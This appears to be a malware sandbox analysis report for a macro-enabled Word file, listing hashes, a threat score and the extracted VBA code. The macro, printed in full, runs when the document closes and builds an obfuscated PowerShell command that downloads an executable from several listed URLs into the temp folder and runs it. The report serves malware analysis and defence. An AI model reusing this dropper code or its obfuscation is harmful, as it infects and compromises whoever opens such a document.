Behavioral task
behavioral1
Sample
malware300.docm
Resource
win7-20240708-en
10 signatures
150 seconds
Behavioral task
behavioral2
Sample
malware300.docm
Resource
win10v2004-20240802-en
9 signatures
150 seconds
General
-
Target
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e
-
Size
70KB
-
MD5
eab6314ab3b3cf2bf2f59be5bb5dd5c5
-
SHA1
c63d8530b25d733004cb83dc1097ac864c6146a2
-
SHA256
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e
-
SHA512
e619466d6169bb9253aa7554e3ffa3278dc445525022d5e21b184910360a746929caa9195111f1755df077465241039c6626881a00ec88b806d91a83b8c4fbfd
-
SSDEEP
1536:LWnLvxSWinYL13cAHhr7bHZkURdwhndpn0cHIVtDAbfdI0zXq+BO:L6pSWFcAHNHZpRdwdAcHIVqfyGXG
Score
8/10
Malware Config
Signatures
-
resource static1/unpack001/malware300
Files
-
7acbd269edee0a82d503537c4227ef7203fe4a188be7b7d3c1d90f2360f69b4e.zip
Password: infected
-
malware300.docm office2007
ThisDocument
1Attribute VB_Name = "ThisDocument"2Attribute VB_Base = "1Normal.ThisDocument"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = True8Attribute VB_Customizable = True910Sub AutoClose()11Dim gyoEtjsVKarhPbkq12gyoEtjsVKarhPbkq = "piBjIwypVXxB"13lgczLPOJlbyvFuRyYnpBhkZb (gyoEtjsVKarhPbkq)14End Sub15Function NPOCIrXGZiHwY()16Dim EXYFFzrcdotFqdz17EXYFFzrcdotFqdz = "$qcVYBGR = 'hnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrgnXFronXFrknXFrenXFrenXFrnnXFranXFrknXFrtnXFrenXFr.nXFrtnXFronXFrpnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrvnXFrinXFrdnXFrenXFronXFranXFrnnXFranXFrlnXFrynXFrsnXFrtnXFrenXFrsnXFr.nXFrwnXFrenXFrbnXFrcnXFranXFrmnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1nXFr,nXFrhnXFrtnXFrtnXFrpnXFr:nXFr/nXFr/nXFrpnXFrhnXFronXFrtnXFronXFrgnXFrrnXFranXFrpnXFrhnXFrynXFrpnXFronXFrinXFrnnXFrtnXFrenXFrrnXFr.nXFrmnXFrenXFrnnXFr/nXFranXFrdnXFrmnXFrinXFrnnXFr.nXFrpnXFrhnXFrpnXFr?nXFrfnXFr=nXFr1' -re" + "place 'nXFr', '';"18NPOCIrXGZiHwY = EXYFFzrcdotFqdz19End Function20Function OCHkNFkDGVtHVAQgkAeQTfUm()21Dim AsFmAalkqsGV22AsFmAalkqsGV = "$bgkEHeJDiO = $qcVYBGR.Sp" + "lit(',');$dRdkqYLYer = $eLcL.next(1, 65536);$nmLnTiCn = $env:te" + "mp + '\' + $dRdkqYLYer + '.exe';for" + "each($crvyHl in $bgkEHeJDiO){try{$mYRg.Down" + "loadFile($crvyHl.ToS" + "tring(), $nmLnTiCn);S" + "tart-Pro" + "cess $nmLnTiCn;break;}catch{write-host $_.Exce" + "ption.Me" + "ssage;}}"23OCHkNFkDGVtHVAQgkAeQTfUm = AsFmAalkqsGV24End Function25Function lgczLPOJlbyvFuRyYnpBhkZb(IVhVynCHwZRz)26Dim ojbYzLWbiTK27Dim qETIjefSpE28Dim TmZouuYApDKTLFfrDLvibAbw29qETIjefSpE = NPOCIrXGZiHwY()30TmZouuYApDKTLFfrDLvibAbw = OCHkNFkDGVtHVAQgkAeQTfUm()31ojbYzLWbiTK = "p" + "ow" + "er" + "she" + "ll $mYRg = n" + "ew-" + "ob" + "ject Sy" + "stem.N" + "et.We" + "bCli" + "ent;$eLcL = ne" + "w-ob" + "ject ra" + "ndo" + "m; "32CreateObject("WScript.Shell").Run ojbYzLWbiTK + qETIjefSpE + TmZouuYApDKTLFfrDLvibAbw, 033End Function34Module1
1Attribute VB_Name = "Module1"2Module2
1Attribute VB_Name = "Module2"2